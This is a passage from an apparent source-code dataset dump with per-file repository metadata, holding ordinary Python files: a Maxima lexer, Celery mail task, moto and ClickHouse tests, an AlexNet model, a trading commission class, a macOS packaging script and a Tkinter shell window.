(r'[-+]?(\d*\.\d+([bdefls][-+]?\d+)?|\d+(\.\d*)?[bdefls][-+]?\d+)', Number.Float),
(r'[-+]?\d+', Number.Integer),
(r'\s+', Text.Whitespace),
(r'.', Text)
],
'comment': [
(r'[^*/]+', Comment.Multiline),
(r'/\*', Comment.Multiline, '#push'),
(r'\*/', Comment.Multiline, '#pop'),
(r'[*/]', Comment.Multiline)
]
}
def analyse_text (text):
strength = 0.0
# Input expression terminator.
if re.search (r'\$\s*$', text, re.MULTILINE):
strength += 0.05
# Function definition operator.
if ':=' in text:
strength += 0.02
return strength
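# Minimal usage sketch (illustrative): highlight a small Maxima snippet with
# this lexer and print the ANSI-colored result.
if __name__ == "__main__":
    from pygments import highlight
    from pygments.formatters import TerminalFormatter

    sample = "f(x) := x^2 + %pi$\nintegrate(f(x), x, 0, 1);"
    print(highlight(sample, MaximaLexer(), TerminalFormatter()))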
| 31.870588
| 94
| 0.444075
|
b93cfb83ea1e7bf35848c852073094a4cb16e8fa
| 860
|
py
|
Python
|
app/tasks.py
|
janist7/mangarso.com
|
74210c604b27084213b519a28ffae6f01e552900
|
[
"MIT"
] | null | null | null |
app/tasks.py
|
janist7/mangarso.com
|
74210c604b27084213b519a28ffae6f01e552900
|
[
"MIT"
] | null | null | null |
app/tasks.py
|
janist7/mangarso.com
|
74210c604b27084213b519a28ffae6f01e552900
|
[
"MIT"
] | null | null | null |
from flask import render_template
from app.extensions import celery, mail
from app.database import db
from celery.signals import task_postrun
from flask_mail import Message
# Sends registration e-mail
@celery.task
def send_registration_email(user, email, token):
msg = Message(
'User Registration',
sender='no-reply@recipes.com',
recipients=[email]
)
msg.body = render_template(
'mail/registration.mail',
user=user,
token=token
)
mail.send(msg)
@task_postrun.connect
def close_session(*args, **kwargs):
# Flask SQLAlchemy will automatically create new sessions for you from
# a scoped session factory, given that we are maintaining the same app
# context, this ensures tasks have a fresh session (e.g. session errors
# won't propagate across tasks)
db.session.remove()
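# Illustrative usage sketch (values are placeholders): from a request handler,
# queue the registration e-mail asynchronously instead of sending it inline.
#
# send_registration_email.delay("alice", "alice@example.com", "signed-token")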
| 28.666667
| 75
| 0.70814
|
d6f16c0740c6dd87a72267780993621baa27bc18
| 9,499
|
py
|
Python
|
tests/test_batch/test_batch_cloudformation.py
|
cprimera/moto
|
64e16d970ac5ec5c6887ac0c5478f0bb31f4fd8a
|
[
"Apache-2.0"
] | null | null | null |
tests/test_batch/test_batch_cloudformation.py
|
cprimera/moto
|
64e16d970ac5ec5c6887ac0c5478f0bb31f4fd8a
|
[
"Apache-2.0"
] | null | null | null |
tests/test_batch/test_batch_cloudformation.py
|
cprimera/moto
|
64e16d970ac5ec5c6887ac0c5478f0bb31f4fd8a
|
[
"Apache-2.0"
] | null | null | null |
import boto3
import sure # noqa # pylint: disable=unused-import
from moto import (
mock_batch,
mock_iam,
mock_ec2,
mock_ecs,
mock_cloudformation,
)
import json
from uuid import uuid4
DEFAULT_REGION = "eu-central-1"
def _get_clients():
return (
boto3.client("ec2", region_name=DEFAULT_REGION),
boto3.client("iam", region_name=DEFAULT_REGION),
boto3.client("ecs", region_name=DEFAULT_REGION),
boto3.client("logs", region_name=DEFAULT_REGION),
boto3.client("batch", region_name=DEFAULT_REGION),
)
def _setup(ec2_client, iam_client):
"""
Do prerequisite setup
:return: VPC ID, Subnet ID, Security group ID, IAM Role ARN
:rtype: tuple
"""
resp = ec2_client.create_vpc(CidrBlock="172.30.0.0/24")
vpc_id = resp["Vpc"]["VpcId"]
resp = ec2_client.create_subnet(
AvailabilityZone="eu-central-1a", CidrBlock="172.30.0.0/25", VpcId=vpc_id
)
subnet_id = resp["Subnet"]["SubnetId"]
resp = ec2_client.create_security_group(
Description="test_sg_desc", GroupName=str(uuid4())[0:6], VpcId=vpc_id
)
sg_id = resp["GroupId"]
role_name = str(uuid4())[0:6]
resp = iam_client.create_role(
RoleName=role_name, AssumeRolePolicyDocument="some_policy"
)
iam_arn = resp["Role"]["Arn"]
iam_client.create_instance_profile(InstanceProfileName=role_name)
iam_client.add_role_to_instance_profile(
InstanceProfileName=role_name, RoleName=role_name
)
return vpc_id, subnet_id, sg_id, iam_arn
@mock_cloudformation()
@mock_ec2
@mock_ecs
@mock_iam
@mock_batch
def test_create_env_cf():
ec2_client, iam_client, _, _, _ = _get_clients()
_, subnet_id, sg_id, iam_arn = _setup(ec2_client, iam_client)
create_environment_template = {
"Resources": {
"ComputeEnvironment": {
"Type": "AWS::Batch::ComputeEnvironment",
"Properties": {
"Type": "MANAGED",
"ComputeResources": {
"Type": "EC2",
"MinvCpus": 0,
"DesiredvCpus": 0,
"MaxvCpus": 64,
"InstanceTypes": ["optimal"],
"Subnets": [subnet_id],
"SecurityGroupIds": [sg_id],
"InstanceRole": iam_arn.replace("role", "instance-profile"),
},
"ServiceRole": iam_arn,
},
}
}
}
cf_json = json.dumps(create_environment_template)
cf_conn = boto3.client("cloudformation", DEFAULT_REGION)
stack_name = str(uuid4())[0:6]
stack_id = cf_conn.create_stack(StackName=stack_name, TemplateBody=cf_json)[
"StackId"
]
stack_resources = cf_conn.list_stack_resources(StackName=stack_id)
stack_resources["StackResourceSummaries"][0]["ResourceStatus"].should.equal(
"CREATE_COMPLETE"
)
# Spot checks on the ARN
stack_resources["StackResourceSummaries"][0]["PhysicalResourceId"].startswith(
"arn:aws:batch:"
)
stack_resources["StackResourceSummaries"][0]["PhysicalResourceId"].should.contain(
stack_name
)
@mock_cloudformation()
@mock_ec2
@mock_ecs
@mock_iam
@mock_batch
def test_create_job_queue_cf():
ec2_client, iam_client, _, _, _ = _get_clients()
_, subnet_id, sg_id, iam_arn = _setup(ec2_client, iam_client)
create_environment_template = {
"Resources": {
"ComputeEnvironment": {
"Type": "AWS::Batch::ComputeEnvironment",
"Properties": {
"Type": "MANAGED",
"ComputeResources": {
"Type": "EC2",
"MinvCpus": 0,
"DesiredvCpus": 0,
"MaxvCpus": 64,
"InstanceTypes": ["optimal"],
"Subnets": [subnet_id],
"SecurityGroupIds": [sg_id],
"InstanceRole": iam_arn.replace("role", "instance-profile"),
},
"ServiceRole": iam_arn,
},
},
"JobQueue": {
"Type": "AWS::Batch::JobQueue",
"Properties": {
"Priority": 1,
"ComputeEnvironmentOrder": [
{
"Order": 1,
"ComputeEnvironment": {"Ref": "ComputeEnvironment"},
}
],
},
},
}
}
cf_json = json.dumps(create_environment_template)
cf_conn = boto3.client("cloudformation", DEFAULT_REGION)
stack_name = str(uuid4())[0:6]
stack_id = cf_conn.create_stack(StackName=stack_name, TemplateBody=cf_json)[
"StackId"
]
stack_resources = cf_conn.list_stack_resources(StackName=stack_id)
len(stack_resources["StackResourceSummaries"]).should.equal(2)
job_queue_resource = list(
filter(
lambda item: item["ResourceType"] == "AWS::Batch::JobQueue",
stack_resources["StackResourceSummaries"],
)
)[0]
job_queue_resource["ResourceStatus"].should.equal("CREATE_COMPLETE")
# Spot checks on the ARN
job_queue_resource["PhysicalResourceId"].startswith("arn:aws:batch:")
job_queue_resource["PhysicalResourceId"].should.contain(stack_name)
job_queue_resource["PhysicalResourceId"].should.contain("job-queue/")
@mock_cloudformation()
@mock_ec2
@mock_ecs
@mock_iam
@mock_batch
def test_create_job_def_cf():
ec2_client, iam_client, _, _, _ = _get_clients()
_, subnet_id, sg_id, iam_arn = _setup(ec2_client, iam_client)
create_environment_template = {
"Resources": {
"ComputeEnvironment": {
"Type": "AWS::Batch::ComputeEnvironment",
"Properties": {
"Type": "MANAGED",
"ComputeResources": {
"Type": "EC2",
"MinvCpus": 0,
"DesiredvCpus": 0,
"MaxvCpus": 64,
"InstanceTypes": ["optimal"],
"Subnets": [subnet_id],
"SecurityGroupIds": [sg_id],
"InstanceRole": iam_arn.replace("role", "instance-profile"),
},
"ServiceRole": iam_arn,
},
},
"JobQueue": {
"Type": "AWS::Batch::JobQueue",
"Properties": {
"Priority": 1,
"ComputeEnvironmentOrder": [
{
"Order": 1,
"ComputeEnvironment": {"Ref": "ComputeEnvironment"},
}
],
},
},
"JobDefinition": {
"Type": "AWS::Batch::JobDefinition",
"Properties": {
"Type": "container",
"ContainerProperties": {
"Image": {
"Fn::Join": [
"",
[
"137112412989.dkr.ecr.",
{"Ref": "AWS::Region"},
".amazonaws.com/amazonlinux:latest",
],
]
},
"Vcpus": 2,
"Memory": 2000,
"Command": ["echo", "Hello world"],
"LinuxParameters": {"Devices": [{"HostPath": "test-path"}]},
},
"RetryStrategy": {"Attempts": 1},
},
},
}
}
cf_json = json.dumps(create_environment_template)
cf_conn = boto3.client("cloudformation", DEFAULT_REGION)
stack_name = str(uuid4())[0:6]
stack_id = cf_conn.create_stack(StackName=stack_name, TemplateBody=cf_json)[
"StackId"
]
stack_resources = cf_conn.list_stack_resources(StackName=stack_id)
len(stack_resources["StackResourceSummaries"]).should.equal(3)
job_def_resource = list(
filter(
lambda item: item["ResourceType"] == "AWS::Batch::JobDefinition",
stack_resources["StackResourceSummaries"],
)
)[0]
job_def_resource["ResourceStatus"].should.equal("CREATE_COMPLETE")
# Spot checks on the ARN
job_def_resource["PhysicalResourceId"].startswith("arn:aws:batch:")
job_def_resource["PhysicalResourceId"].should.contain(f"{stack_name}-JobDef")
job_def_resource["PhysicalResourceId"].should.contain("job-definition/")
# Test the linux parameter device host path
# This ensures that batch is parsing the parameter dictionaries
# correctly by recursively converting the first character of all
# dict keys to lowercase.
batch_conn = boto3.client("batch", DEFAULT_REGION)
response = batch_conn.describe_job_definitions(
jobDefinitions=[job_def_resource["PhysicalResourceId"]]
)
job_def_linux_device_host_path = response.get("jobDefinitions")[0][
"containerProperties"
]["linuxParameters"]["devices"][0]["hostPath"]
job_def_linux_device_host_path.should.equal("test-path")
| 34.292419
| 86
| 0.536583
|
cfd7d58d574fc2568d47b387697f63a5b30b595d
| 3,367
|
py
|
Python
|
tests/integration/test_dictionaries_dependency_xml/test.py
|
athom/ClickHouse
|
4f4cc9d7404fd489a7229633b22b5ea1889bd8c0
|
[
"Apache-2.0"
] | 3
|
2019-06-27T08:59:08.000Z
|
2021-09-03T02:38:02.000Z
|
tests/integration/test_dictionaries_dependency_xml/test.py
|
athom/ClickHouse
|
4f4cc9d7404fd489a7229633b22b5ea1889bd8c0
|
[
"Apache-2.0"
] | 1
|
2021-06-28T15:03:05.000Z
|
2021-06-28T15:03:05.000Z
|
tests/integration/test_dictionaries_dependency_xml/test.py
|
athom/ClickHouse
|
4f4cc9d7404fd489a7229633b22b5ea1889bd8c0
|
[
"Apache-2.0"
] | 1
|
2022-01-11T05:56:58.000Z
|
2022-01-11T05:56:58.000Z
|
import pytest
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import assert_eq_with_retry
DICTIONARY_FILES = ['configs/dictionaries/dep_x.xml', 'configs/dictionaries/dep_y.xml',
'configs/dictionaries/dep_z.xml']
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance', dictionaries=DICTIONARY_FILES)
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
instance.query('''
CREATE DATABASE IF NOT EXISTS dict ENGINE=Dictionary;
CREATE DATABASE IF NOT EXISTS test;
DROP TABLE IF EXISTS test.elements;
CREATE TABLE test.elements (id UInt64, a String, b Int32, c Float64) ENGINE=Log;
INSERT INTO test.elements VALUES (0, 'water', 10, 1), (1, 'air', 40, 0.01), (2, 'earth', 100, 1.7);
''')
yield cluster
finally:
cluster.shutdown()
def get_status(dictionary_name):
return instance.query("SELECT status FROM system.dictionaries WHERE name='" + dictionary_name + "'").rstrip("\n")
def test_get_data(started_cluster):
query = instance.query
# dictionaries_lazy_load == false, so these dictionary are not loaded.
assert get_status('dep_x') == 'NOT_LOADED'
assert get_status('dep_y') == 'NOT_LOADED'
assert get_status('dep_z') == 'NOT_LOADED'
# Dictionary 'dep_x' depends on 'dep_z', which depends on 'dep_y'.
# So they all should be loaded at once.
assert query("SELECT dictGetString('dep_x', 'a', toUInt64(1))") == "air\n"
assert get_status('dep_x') == 'LOADED'
assert get_status('dep_y') == 'LOADED'
assert get_status('dep_z') == 'LOADED'
# Other dictionaries should work too.
assert query("SELECT dictGetString('dep_y', 'a', toUInt64(1))") == "air\n"
assert query("SELECT dictGetString('dep_z', 'a', toUInt64(1))") == "air\n"
assert query("SELECT dictGetString('dep_x', 'a', toUInt64(3))") == "XX\n"
assert query("SELECT dictGetString('dep_y', 'a', toUInt64(3))") == "YY\n"
assert query("SELECT dictGetString('dep_z', 'a', toUInt64(3))") == "ZZ\n"
# Update the source table.
query("INSERT INTO test.elements VALUES (3, 'fire', 30, 8)")
# Wait for dictionaries to be reloaded.
assert_eq_with_retry(instance, "SELECT dictHas('dep_y', toUInt64(3))", "1", sleep_time=2, retry_count=10)
assert query("SELECT dictGetString('dep_x', 'a', toUInt64(3))") == "XX\n"
assert query("SELECT dictGetString('dep_y', 'a', toUInt64(3))") == "fire\n"
assert query("SELECT dictGetString('dep_z', 'a', toUInt64(3))") == "ZZ\n"
    # dep_x and dep_z are updated only when the value of `intDiv(count(), 5)` changes.
query("INSERT INTO test.elements VALUES (4, 'ether', 404, 0.001)")
assert_eq_with_retry(instance, "SELECT dictHas('dep_x', toUInt64(4))", "1", sleep_time=2, retry_count=10)
assert query("SELECT dictGetString('dep_x', 'a', toUInt64(3))") == "fire\n"
assert query("SELECT dictGetString('dep_y', 'a', toUInt64(3))") == "fire\n"
assert query("SELECT dictGetString('dep_z', 'a', toUInt64(3))") == "fire\n"
assert query("SELECT dictGetString('dep_x', 'a', toUInt64(4))") == "ether\n"
assert query("SELECT dictGetString('dep_y', 'a', toUInt64(4))") == "ether\n"
assert query("SELECT dictGetString('dep_z', 'a', toUInt64(4))") == "ether\n"
| 44.302632
| 117
| 0.656371
|
5f83efff1d75c76926f4585ad91043d7b71293e6
| 213
|
py
|
Python
|
vehicle-counting-and-classification-opencv-master/soc.py
|
pb-10/Trafix
|
5bb5d6de44be9bf65a3e245467c0176ae5e2e3d5
|
[
"MIT"
] | 1
|
2019-10-07T04:41:58.000Z
|
2019-10-07T04:41:58.000Z
|
vehicle-counting-and-classification-opencv-master/soc.py
|
DaScientist/Trafix
|
5bb5d6de44be9bf65a3e245467c0176ae5e2e3d5
|
[
"MIT"
] | null | null | null |
vehicle-counting-and-classification-opencv-master/soc.py
|
DaScientist/Trafix
|
5bb5d6de44be9bf65a3e245467c0176ae5e2e3d5
|
[
"MIT"
] | 1
|
2019-10-07T04:42:08.000Z
|
2019-10-07T04:42:08.000Z
|
import socket
s=socket.socket()
print("success")
port=8080
s.bind(('',port))
print("socket binded to %s" %(port))
s.listen(1)
print("listening")
c, addr = s.accept()
print("got connection")
c.close()
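# Illustrative client-side counterpart (sketch; run from a separate process
# while the server above is listening):
#
# import socket
# client = socket.socket()
# client.connect(('127.0.0.1', 8080))
# client.close()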
| 16.384615
| 37
| 0.638498
|
d5754ee0684e7607b3f0e683cf70074d8bd9b64b
| 2,069
|
py
|
Python
|
src/models/AlexNet.py
|
AdrienVerdier/ProjetIFT780
|
c699449d735f5df3314d2cd5143974a745560289
|
[
"MIT"
] | null | null | null |
src/models/AlexNet.py
|
AdrienVerdier/ProjetIFT780
|
c699449d735f5df3314d2cd5143974a745560289
|
[
"MIT"
] | null | null | null |
src/models/AlexNet.py
|
AdrienVerdier/ProjetIFT780
|
c699449d735f5df3314d2cd5143974a745560289
|
[
"MIT"
] | null | null | null |
"""
IFT780 term project
Date:
Authors: Alexandre Turpin, Quentin Levieux and Adrien Verdier
License: Opensource, free to use
Other: This file implements the AlexNet model
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
from src.models.CNNBlocks import ConvBlock
class AlexNet(nn.Module):
"""
Class used to implement the AlexNet model
"""
def __init__(self, in_channels, num_classes):
"""
Args:
in_channels: The input channel for this model
num_classes: The number of classes
"""
super(AlexNet, self).__init__()
self.conv1 = nn.Sequential(
ConvBlock(in_channels, 96, kernel_size=11, stride=4, padding=0),
nn.MaxPool2d(kernel_size=3, stride=2)
)
self.conv2 = nn.Sequential(
ConvBlock(96, 256, kernel_size=5, stride=1, padding=2),
nn.MaxPool2d(kernel_size=3, stride=2),
)
self.conv3 = ConvBlock(256, 384, kernel_size=3, stride=1, padding=1)
self.conv4 = ConvBlock(384, 384, kernel_size=3, stride=1, padding=1)
self.conv5 = nn.Sequential(
ConvBlock(384, 256, kernel_size=3, stride=1, padding=1),
nn.MaxPool2d(kernel_size=3, stride=2),
)
self.linear_layers = nn.Sequential(
nn.Linear(256 * 6 * 6, 4096),
nn.Dropout(p=0.5),
nn.Linear(4096, 4096),
nn.Dropout(p=0.5),
nn.Linear(4096, num_classes),
)
def forward(self, x):
"""
        This method implements the forward propagation of our model
Args :
x: The input of the model
Returns :
out: The output of the model
"""
out = self.conv1(x)
out = self.conv2(out)
out = self.conv3(out)
out = self.conv4(out)
out = self.conv5(out)
out = out.view(out.size(0), -1)
out = self.linear_layers(out)
out = F.log_softmax(out, dim=1)
return out
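# Minimal shape-check sketch (illustrative, assuming the local ConvBlock import
# resolves): AlexNet expects 227x227 inputs so the feature map is 256x6x6
# before the classifier.
if __name__ == "__main__":
    model = AlexNet(in_channels=3, num_classes=10)
    dummy = torch.randn(1, 3, 227, 227)
    print(model(dummy).shape)  # expected: torch.Size([1, 10])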
| 26.87013
| 76
| 0.569357
|
785601586704ef9cfca4aa8a158dbb0e6725aabd
| 2,133
|
py
|
Python
|
forte/utils.py
|
huzecong/forte
|
beae4e923c9a6873b582588972e6ec9919079271
|
[
"Apache-2.0"
] | null | null | null |
forte/utils.py
|
huzecong/forte
|
beae4e923c9a6873b582588972e6ec9919079271
|
[
"Apache-2.0"
] | null | null | null |
forte/utils.py
|
huzecong/forte
|
beae4e923c9a6873b582588972e6ec9919079271
|
[
"Apache-2.0"
] | null | null | null |
"""
Util functions
"""
from pydoc import locate
__all__ = [
"get_full_module_name",
"get_class_name",
"get_class",
"get_qual_name",
]
def get_full_module_name(o, lower=False):
"""
Returns the full module and class name of an object o.
    For example, for our :class:`OntonotesReader`, returns
'nlp.forte.data.readers.ontonotes_reader.OntonotesReader'.
"""
if not isinstance(o, type):
o = o.__class__
module = o.__module__
if module is None or module == str.__class__.__module__:
return o.__name__
name = module + '.' + o.__name__
if lower:
return name.lower()
else:
return name
def get_class_name(o, lower=False):
"""
Returns the class name of an object o.
"""
if not isinstance(o, type):
o = o.__class__
if lower:
return o.__name__.lower()
else:
return o.__name__
def get_class(class_name, module_paths=None):
"""Returns the class based on class name.
Args:
class_name (str): Name or full path to the class.
module_paths (list): Paths to candidate modules to search for the
class. This is used if the class cannot be located solely based on
`class_name`. The first module in the list that contains the class
is used.
Returns:
The target class.
Raises:
ValueError: If class is not found based on :attr:`class_name` and
:attr:`module_paths`.
"""
class_ = locate(class_name)
if (class_ is None) and (module_paths is not None):
for module_path in module_paths:
class_ = locate('.'.join([module_path, class_name]))
if class_ is not None:
break
if class_ is None:
raise ValueError(
"Class not found in {}: {}".format(module_paths, class_name))
return class_
def get_qual_name(o, lower=False):
"""
Returns the qualified name of an object o.
"""
if not isinstance(o, type):
o = o.__class__
if lower:
return o.__qualname__.lower()
else:
return o.__qualname__
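# Minimal usage sketch for the helpers above (illustrative only).
if __name__ == "__main__":
    ordered_dict_cls = get_class("OrderedDict", module_paths=["collections"])
    instance = ordered_dict_cls()
    print(get_full_module_name(instance))  # collections.OrderedDict
    print(get_class_name(instance))        # OrderedDict
    print(get_qual_name(instance))         # OrderedDict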
| 25.094118
| 78
| 0.614158
|
24266b2591436a5f6a532571b9070945626d7569
| 1,844
|
py
|
Python
|
btoandav20/commissions/oandav20comm.py
|
josipbudzaki/btoandav20
|
f6b7db07e37ed0d97df8a9c2337ce4b7e5953f56
|
[
"Apache-2.0"
] | 60
|
2018-03-01T20:55:40.000Z
|
2020-08-24T13:13:42.000Z
|
btoandav20/commissions/oandav20comm.py
|
josipbudzaki/btoandav20
|
f6b7db07e37ed0d97df8a9c2337ce4b7e5953f56
|
[
"Apache-2.0"
] | 54
|
2018-03-02T14:14:23.000Z
|
2020-08-18T12:09:35.000Z
|
btoandav20/commissions/oandav20comm.py
|
josipbudzaki/btoandav20
|
f6b7db07e37ed0d97df8a9c2337ce4b7e5953f56
|
[
"Apache-2.0"
] | 33
|
2018-07-10T00:56:21.000Z
|
2020-07-28T12:56:44.000Z
|
from backtrader.comminfo import CommInfoBase
class OandaV20BacktestCommInfo(CommInfoBase):
params = dict(
spread=0.0,
acc_counter_currency=True,
pip_location=-4,
margin=0.5,
leverage=20.0,
stocklike=False,
commtype=CommInfoBase.COMM_FIXED,
)
def __init__(self, data=None):
self.data = data
if self.p.stocklike:
raise Exception('Stocklike is not supported')
super(OandaV20BacktestCommInfo, self).__init__()
def getsize(self, price, cash):
'''Returns the needed size to meet a cash operation at a given price'''
size = super(OandaV20BacktestCommInfo, self).getsize(price, cash)
size *= self.p.margin
if not self.p.acc_counter_currency:
size /= price
return int(size)
def _getcommission(self, size, price, pseudoexec):
'''
This scheme will apply half the commission when buying and half when selling.
If account currency is same as the base currency, change pip value calc.
https://community.backtrader.com/topic/525/forex-commission-scheme
'''
if (self.data is not None
and hasattr(self.data.l, 'bid_close')
and hasattr(self.data.l, 'ask_close')
and hasattr(self.data.l, 'mid_close')):
if size > 0:
spread = self.data.l.mid_close[0] - self.data.l.bid_close[0]
else:
spread = self.data.l.ask_close[0] - self.data.l.mid_close[0]
else:
spread = self.p.spread
multiplier = float(10 ** self.p.pip_location)
if self.p.acc_counter_currency:
comm = abs(spread * (size * multiplier))
else:
comm = abs(spread * ((size / price) * multiplier))
return comm / 2
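# Illustrative wiring sketch (not part of this module; assumes a standard
# backtrader setup): attach the commission scheme to the backtest broker.
#
# import backtrader as bt
#
# cerebro = bt.Cerebro()
# comminfo = OandaV20BacktestCommInfo(spread=2.0, pip_location=-4,
#                                     acc_counter_currency=False)
# cerebro.broker.addcommissioninfo(comminfo)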
| 35.461538
| 85
| 0.596529
|
ce5d3418e34186ca5ac4a843e3744a42ed1ecdd6
| 3,712
|
py
|
Python
|
contrib/macdeploy/custom_dsstore.py
|
VsyncCrypto/stakecube
|
bff96b4622b8fcfe1e767c252ceaf54c10d4eda5
|
[
"MIT"
] | null | null | null |
contrib/macdeploy/custom_dsstore.py
|
VsyncCrypto/stakecube
|
bff96b4622b8fcfe1e767c252ceaf54c10d4eda5
|
[
"MIT"
] | null | null | null |
contrib/macdeploy/custom_dsstore.py
|
VsyncCrypto/stakecube
|
bff96b4622b8fcfe1e767c252ceaf54c10d4eda5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2013-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import biplist
from ds_store import DSStore
from mac_alias import Alias
import sys
output_file = sys.argv[1]
package_name_ns = sys.argv[2]
ds = DSStore.open(output_file, 'w+')
ds['.']['bwsp'] = {
'ShowStatusBar': False,
'WindowBounds': '{{300, 280}, {500, 343}}',
'ContainerShowSidebar': False,
'SidebarWidth': 0,
'ShowTabView': False,
'PreviewPaneVisibility': False,
'ShowToolbar': False,
'ShowSidebar': False,
'ShowPathbar': True
}
icvp = {
'gridOffsetX': 0.0,
'textSize': 12.0,
'viewOptionsVersion': 1,
'backgroundImageAlias': b'\x00\x00\x00\x00\x02\x1e\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd1\x94\\\xb0H+\x00\x05\x00\x00\x00\x98\x0fbackground.tiff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\xd19\xb0\xf8\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\r\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b.background\x00\x00\x10\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x11\x00\x08\x00\x00\xd19\xb0\xf8\x00\x00\x00\x01\x00\x04\x00\x00\x00\x98\x00\x0e\x00 \x00\x0f\x00b\x00a\x00c\x00k\x00g\x00r\x00o\x00u\x00n\x00d\x00.\x00t\x00i\x00f\x00f\x00\x0f\x00\x02\x00\x00\x00\x12\x00\x1c/.background/background.tiff\x00\x14\x01\x06\x00\x00\x00\x00\x01\x06\x00\x02\x00\x00\x0cMacintosh HD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x97\xab\xc3H+\x00\x00\x01\x88[\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02u\xab\x8d\xd1\x94\\\xb0devrddsk\xff\xff\xff\xff\x00\x00\t \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07bitcoin\x00\x00\x10\x00\x08\x00\x00\xce\x97\xab\xc3\x00\x00\x00\x11\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x01\x00\x14\x01\x88[\x88\x00\x16\xa9\t\x00\x08\xfaR\x00\x08\xfaQ\x00\x02d\x8e\x00\x0e\x00\x02\x00\x00\x00\x0f\x00\x1a\x00\x0c\x00M\x00a\x00c\x00i\x00n\x00t\x00o\x00s\x00h\x00 \x00H\x00D\x00\x13\x00\x01/\x00\x00\x15\x00\x02\x00\x14\xff\xff\x00\x00\xff\xff\x00\x00',
'backgroundColorBlue': 1.0,
'iconSize': 96.0,
'backgroundColorGreen': 1.0,
'arrangeBy': 'none',
'showIconPreview': True,
'gridSpacing': 100.0,
'gridOffsetY': 0.0,
'showItemInfo': False,
'labelOnBottom': True,
'backgroundType': 2,
'backgroundColorRed': 1.0
}
alias = Alias.from_bytes(icvp['backgroundImageAlias'])
alias.volume.name = package_name_ns
alias.volume.posix_path = '/Volumes/' + package_name_ns
alias.volume.disk_image_alias.target.filename = package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.carbon_path = 'Macintosh HD:Users:\x00bitcoinuser:\x00Documents:\x00bitcoin:\x00bitcoin:\x00' + package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.posix_path = 'Users/bitcoinuser/Documents/bitcoin/bitcoin/' + package_name_ns + '.temp.dmg'
alias.target.carbon_path = package_name_ns + ':.background:\x00background.tiff'
icvp['backgroundImageAlias'] = biplist.Data(alias.to_bytes())
ds['.']['icvp'] = icvp
ds['.']['vSrn'] = ('long', 1)
ds['Applications']['Iloc'] = (370, 156)
ds['STAKECUBE-Qt.app']['Iloc'] = (128, 156)
ds.flush()
ds.close()
| 61.866667
| 1,817
| 0.724407
|
373841d05368144873ea5e4e3477de4a98d10202
| 1,332
|
py
|
Python
|
app/core/tests/test_admin.py
|
shreeshailaya/rest-api-recipeapp
|
59e010c25fc7322d14f8028ed71ebdc3f5fc2329
|
[
"MIT"
] | null | null | null |
app/core/tests/test_admin.py
|
shreeshailaya/rest-api-recipeapp
|
59e010c25fc7322d14f8028ed71ebdc3f5fc2329
|
[
"MIT"
] | null | null | null |
app/core/tests/test_admin.py
|
shreeshailaya/rest-api-recipeapp
|
59e010c25fc7322d14f8028ed71ebdc3f5fc2329
|
[
"MIT"
] | null | null | null |
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email="admin@mech2it.com",
password='password123'
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email="test@mech2it.com",
password="password123",
name="Test Uder Full Name"
)
def test_user_listed(self):
'''Test of /admin page'''
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_page_change(self):
''' check that the user edit page works '''
url = reverse('admin:core_user_change', args=[self.user.id])
''' /admin/core/user/id '''
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user(self):
        '''Test that the create user page works'''
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| 31.714286
| 68
| 0.629129
|
0b59daacbf4051881d3272dcd6e1bd7d7ba32503
| 3,403
|
py
|
Python
|
Demo/tkinter/guido/ShellWindow.py
|
AtjonTV/Python-1.4
|
2a80562c5a163490f444181cb75ca1b3089759ec
|
[
"Unlicense",
"TCL",
"DOC",
"AAL",
"X11"
] | null | null | null |
Demo/tkinter/guido/ShellWindow.py
|
AtjonTV/Python-1.4
|
2a80562c5a163490f444181cb75ca1b3089759ec
|
[
"Unlicense",
"TCL",
"DOC",
"AAL",
"X11"
] | null | null | null |
Demo/tkinter/guido/ShellWindow.py
|
AtjonTV/Python-1.4
|
2a80562c5a163490f444181cb75ca1b3089759ec
|
[
"Unlicense",
"TCL",
"DOC",
"AAL",
"X11"
] | null | null | null |
import os
import sys
import string
from Tkinter import *
from ScrolledText import ScrolledText
from Dialog import Dialog
import signal
BUFSIZE = 512
class ShellWindow(ScrolledText):
def __init__(self, master=None, shell=None, **cnf):
if not shell:
try:
shell = os.environ['SHELL']
except KeyError:
shell = '/bin/sh'
shell = shell + ' -i'
args = string.split(shell)
